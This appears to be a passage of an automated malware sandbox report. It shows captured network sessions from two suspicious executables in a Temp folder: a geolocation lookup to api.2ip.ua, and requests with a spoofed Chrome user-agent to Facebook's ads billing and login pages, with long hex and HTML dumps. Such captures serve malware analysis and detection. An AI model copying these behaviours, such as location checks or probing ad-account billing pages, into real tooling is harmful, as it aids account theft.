                                                                                                                                  2022-10-17 20:07:01 UTC327INData Raw: 22 2c 66 64 73 3a 36 30 2c 66 64 61 3a 36 30 2c 69 3a 36 30 2c 73 62 73 3a 31 2c 64 62 73 3a 31 30 30 2c 62 62 73 3a 31 30 30 2c 68 62 69 3a 36 30 2c 72 74 3a 32 36 32 31 34 34 2c 68 62 63 62 63 3a 32 2c 68 62 76 62 63 3a 30 2c 68 62 62 69 3a 33 30 2c 73 69 64 3a 2d 31 2c 68 62 76 3a 22 36 30 35 33 35 39 31 33 32 39 36 31 37 33 39 39 32 33 34 22 7d 5d 5d 2c 5b 22 4e 61 76 69 67 61 74 69 6f 6e 4d 65 74 72 69 63 73 22 2c 22 73 65 74 50 61 67 65 22 2c 5b 5d 2c 5b 7b 70 61 67 65 3a 22 58 57 65 62 4c 6f 67 69 6e 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 70 61 67 65 5f 74 79 70 65 3a 22 6e 6f 72 6d 61 6c 22 2c 70 61 67 65 5f 75 72 69 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74
                                                                                                                                  Data Ascii: ",fds:60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:-1,hbv:"6053591329617399234"}]],["NavigationMetrics","setPage",[],[{page:"XWebLoginController",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=htt
                                                                                                                                  2022-10-17 20:07:01 UTC329INData Raw: 2c 72 64 73 3a 7b 6d 3a 5b 22 43 6f 6e 74 65 78 74 75 61 6c 43 6f 6e 66 69 67 22 2c 22 42 6c 61 64 65 52 75 6e 6e 65 72 43 6c 69 65 6e 74 22 2c 22 44 47 57 52 65 71 75 65 73 74 53 74 72 65 61 6d 43 6c 69 65 6e 74 22 2c 22 4d 71 74 74 4c 6f 6e 67 50 6f 6c 6c 69 6e 67 52 75 6e 6e 65 72 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 72 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 2f 6f 35 59 76 4f 32 22 2c 22 48 4e 4a 6c 7a 30 66 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 45 42 56 67 65 4e 63 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 74 65 32 36 30 4c 65 22 2c 22 51 4d 54 46 61 33 6c 22 2c 22 6a 54 58 64 48 33 65 22 2c 22 63 59 55 33 63 33 32 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 45 46 31 68 57 6c 35 22 5d 7d 2c 62 65 3a 31 7d 2c 52
                                                                                                                                  Data Ascii: ,rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","BanzaiScuba_DEPRECATED"],r:["vcBcJjw","/o5YvO2","HNJlz0f","ZEC4RrQ","EBVgeNc","+RGtM0o","te260Le","QMTFa3l","jTXdH3e","cYU3c32","n6W4xMH","EF1hWl5"]},be:1},R


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  3192.168.2.549701162.0.217.254443C:\Users\user\AppData\Local\Temp\6246.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:04 UTC329OUTGET /geo.json HTTP/1.1
                                                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                                                  Host: api.2ip.ua
                                                                                                                                  2022-10-17 20:07:04 UTC329INHTTP/1.1 429 Too Many Requests
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:04 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  2022-10-17 20:07:04 UTC330INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  4192.168.2.54970331.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:09 UTC331OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:09 UTC331INHTTP/1.1 302 Found
                                                                                                                                  Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:09 UTC333INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  5192.168.2.54970431.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:09 UTC335OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:09 UTC336INHTTP/1.1 200 OK
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:09 UTC337INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                                  2022-10-17 20:07:09 UTC338INData Raw: 38 37 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f
                                                                                                                                  Data Ascii: 874f<!DOCTYPE html><html lang="en" id="faceboo
                                                                                                                                  2022-10-17 20:07:09 UTC338INData Raw: 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 42 67 54 73 38 71 46 4d 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 3f 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 45 6e 76 22 5d
                                                                                                                                  Data Ascii: k" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="BgTs8qFM">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"]
                                                                                                                                  2022-10-17 20:07:09 UTC340INData Raw: 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 77 65 62 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 79 62 2f 72 2f 68 4c 52 4a 31 47 47 5f 79 30 4a 2e
                                                                                                                                  Data Ascii: %2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.
                                                                                                                                  2022-10-17 20:07:09 UTC341INData Raw: 63 72 6f 73 73 2f 74 35 5a 54 68 7a 32 42 34 77 4e 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 4b 41 6a 62 72 6c 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 5f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 76 63 50 71 54 69 52 77 49 69 55 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 41
                                                                                                                                  Data Ascii: cross/t5ZThz2B4wN.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="KAjbrl/" crossorigin="anonymous" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/vcPqTiRwIiU.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="A
                                                                                                                                  2022-10-17 20:07:09 UTC343INData Raw: 2c 22 31 31 36 37 33 39 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 42 70 4e 2d 74 6c 55 50 77 62 49 49 46 67 6b 45 22 7d 2c 22 31 38 35 37 35 38 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 79 54 78 47 4d 70 36 6c 65 30 50 41 74 70 38 41 22 7d 2c 22 32 37 37 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 45 75 32 34 34 57 49 63 65 37 69 77 71 38 54 45 22 7d 2c 22 33 37 35 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 65 53 35 55 54 6b 6b 4d 70 5f 78 62 50 36 47 59 22 7d 2c 22 33 38 33 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 57 32
                                                                                                                                  Data Ascii: ,"1167394":{"result":false,"hash":"AT7BpN-tlUPwbIIFgkE"},"1857581":{"result":false,"hash":"AT5yTxGMp6le0PAtp8A"},"2772":{"result":false,"hash":"AT5Eu244WIce7iwq8TE"},"3752":{"result":false,"hash":"AT6eS5UTkkMp_xbP6GY"},"3831":{"result":false,"hash":"AT4W2
                                                                                                                                  2022-10-17 20:07:09 UTC344INData Raw: 22 3a 22 4e 6f 6e 65 22 7d 2c 22 64 70 72 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 69 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 73 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 73 74 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 53 74 72 69 63 74 22 7d 2c 22 69 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6c 6f 63 61 6c 65 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6d 5f 6c 73 22 3a 7b 22 74 22 3a 31 35 38 32 38 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6d 5f 70 69 78 65 6c 5f 72 61 74 69 6f 22 3a 7b 22 74
                                                                                                                                  Data Ascii: ":"None"},"dpr":{"t":604800,"s":"None"},"fbl_ci":{"t":31536000,"s":"None"},"fbl_cs":{"t":31536000,"s":"None"},"fbl_st":{"t":31536000,"s":"Strict"},"i_user":{"s":"None"},"locale":{"t":604800,"s":"None"},"m_ls":{"t":158284800,"s":"None"},"m_pixel_ratio":{"t
                                                                                                                                  2022-10-17 20:07:09 UTC346INData Raw: 69 66 65 73 74 5f 6f 72 69 67 69 6e 22 3a 6e 75 6c 6c 2c 22 62 65 5f 6f 6e 65 5f 61 68 65 61 64 22 3a 66 61 6c 73 65 2c 22 69 73 5f 72 74 6c 22 3a 66 61 6c 73 65 2c 22 69 73 5f 63 6f 6d 65 74 22 3a 66 61 6c 73 65 2c 22 69 73 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 74 69 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 5f 6a 69 74 5f 77 61 72 6d 65 64 5f 75 70 22 3a 74 72 75 65 2c 22 68 73 69 22 3a 22 37 31 35 35 35 37 35 34 31 33 32 35 35 38 36 31 32 35 32 22 2c 22 73 65 6d 72 5f 68 6f 73 74 5f 62 75 63 6b 65 74 22 3a 22 33 22 2c 22 62 6c 5f 68 61 73 68 5f 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 6b 69 70 5f 72 64 5f 62 6c 22 3a 74 72 75 65 2c 22 63 6f 6d 65 74 5f 65 6e 76 22 3a 30 2c 22 77 62 6c 6f 6b 73 5f 65 6e 76 22 3a 66 61 6c 73 65 2c 22 73 70 69 6e 22 3a 34
                                                                                                                                  Data Ascii: ifest_origin":null,"be_one_ahead":false,"is_rtl":false,"is_comet":false,"is_experimental_tier":false,"is_jit_warmed_up":true,"hsi":"7155575413255861252","semr_host_bucket":"3","bl_hash_version":2,"skip_rd_bl":true,"comet_env":0,"wbloks_env":false,"spin":4
                                                                                                                                  2022-10-17 20:07:09 UTC347INData Raw: 41 44 53 5f 50 4c 41 43 45 4d 45 4e 54 5f 46 49 58 5f 50 55 42 4c 49 53 48 45 52 5f 50 4c 41 54 46 4f 52 4d 53 5f 4d 55 54 41 54 49 4f 4e 22 2c 22 46 4f 52 43 45 5f 46 45 54 43 48 5f 42 4f 4f 53 54 45 44 5f 43 4f 4d 50 4f 4e 45 4e 54 5f 41 46 54 45 52 5f 41 44 53 5f 43 52 45 41 54 49 4f 4e 22 2c 22 56 49 44 45 4f 5f 44 49 4d 45 4e 53 49 4f 4e 53 5f 46 52 4f 4d 5f 50 4c 41 59 45 52 5f 49 4e 5f 55 50 4c 4f 41 44 5f 44 49 41 4c 4f 47 22 2c 22 53 4e 49 56 59 5f 47 52 4f 55 50 5f 42 59 5f 45 56 45 4e 54 5f 54 52 41 43 45 5f 49 44 5f 41 4e 44 5f 4e 41 4d 45 22 2c 22 41 44 53 5f 53 54 4f 52 45 5f 56 49 53 49 54 53 5f 4d 45 54 52 49 43 53 5f 44 45 50 52 45 43 41 54 49 4f 4e 22 2c 22 41 44 5f 44 52 41 46 54 5f 45 4e 41 42 4c 45 5f 53 59 4e 43 52 48 4f 4e 4f 55 53
                                                                                                                                  Data Ascii: ADS_PLACEMENT_FIX_PUBLISHER_PLATFORMS_MUTATION","FORCE_FETCH_BOOSTED_COMPONENT_AFTER_ADS_CREATION","VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG","SNIVY_GROUP_BY_EVENT_TRACE_ID_AND_NAME","ADS_STORE_VISITS_METRICS_DEPRECATION","AD_DRAFT_ENABLE_SYNCRHONOUS
                                                                                                                                  2022-10-17 20:07:09 UTC349INData Raw: 61 6e 64 6f 22 3a 74 72 75 65 7d 2c 32 39 31 35 5d 2c 5b 22 43 6f 6f 6b 69 65 43 6f 72 65 4c 6f 67 67 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6d 61 78 69 6d 75 6d 49 67 6e 6f 72 61 62 6c 65 53 74 61 6c 6c 4d 73 22 3a 31 36 2e 36 37 2c 22 73 61 6d 70 6c 65 52 61 74 65 22 3a 39 2e 37 65 2d 35 2c 22 73 61 6d 70 6c 65 52 61 74 65 43 6c 61 73 73 69 63 22 3a 31 2e 30 65 2d 31 30 2c 22 73 61 6d 70 6c 65 52 61 74 65 46 61 73 74 53 74 61 6c 65 22 3a 31 2e 30 65 2d 38 7d 2c 33 34 30 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c 7b 22 70 72 65 66 65 72 5f 6d 65 73 73 61 67 65 5f 63 68 61 6e 6e 65 6c 22 3a 74 72 75 65 7d 2c 33 34 31 39 5d 2c 5b 22 44 54 53 47 49 6e 69 74 44
                                                                                                                                  Data Ascii: ando":true},2915],["CookieCoreLoggingConfig",[],{"maximumIgnorableStallMs":16.67,"sampleRate":9.7e-5,"sampleRateClassic":1.0e-10,"sampleRateFastStale":1.0e-8},3401],["ImmediateImplementationExperiments",[],{"prefer_message_channel":true},3419],["DTSGInitD
                                                                                                                                  2022-10-17 20:07:09 UTC350INData Raw: 35 34 30 5d 2c 5b 22 42 69 67 50 69 70 65 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c 7b 22 6c 69 6e 6b 5f 69 6d 61 67 65 73 5f 74 6f 5f 70 61 67 65 6c 65 74 73 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 62 69 67 70 69 70 65 5f 70 6c 75 67 69 6e 73 22 3a 66 61 6c 73 65 7d 2c 39 30 37 5d 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 48 6f 6c 64 6f 75 74 22 2c 5b 5d 2c 7b 22 64 69 73 61 62 6c 65 5f 76 61 72 69 61 74 69 6f 6e 22 3a 66 61 6c 73 65 7d 2c 36 35 33 33 5d 2c 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 72 65 74 72 79 4f 6e 4e 65 74 77 6f 72 6b 45 72 72 6f 72 22 3a 22 31 22 2c 22 75 73 65 46 65 74 63 68 53 74 72 65 61 6d 41 6a 61 78 50 69 70 65 54 72 61 6e 73 70 6f 72 74 22 3a 66 61 6c 73 65 7d 2c 33
                                                                                                                                  Data Ascii: 540],["BigPipeExperiments",[],{"link_images_to_pagelets":false,"enable_bigpipe_plugins":false},907],["IntlVariationHoldout",[],{"disable_variation":false},6533],["AsyncRequestConfig",[],{"retryOnNetworkError":"1","useFetchStreamAjaxPipeTransport":false},3
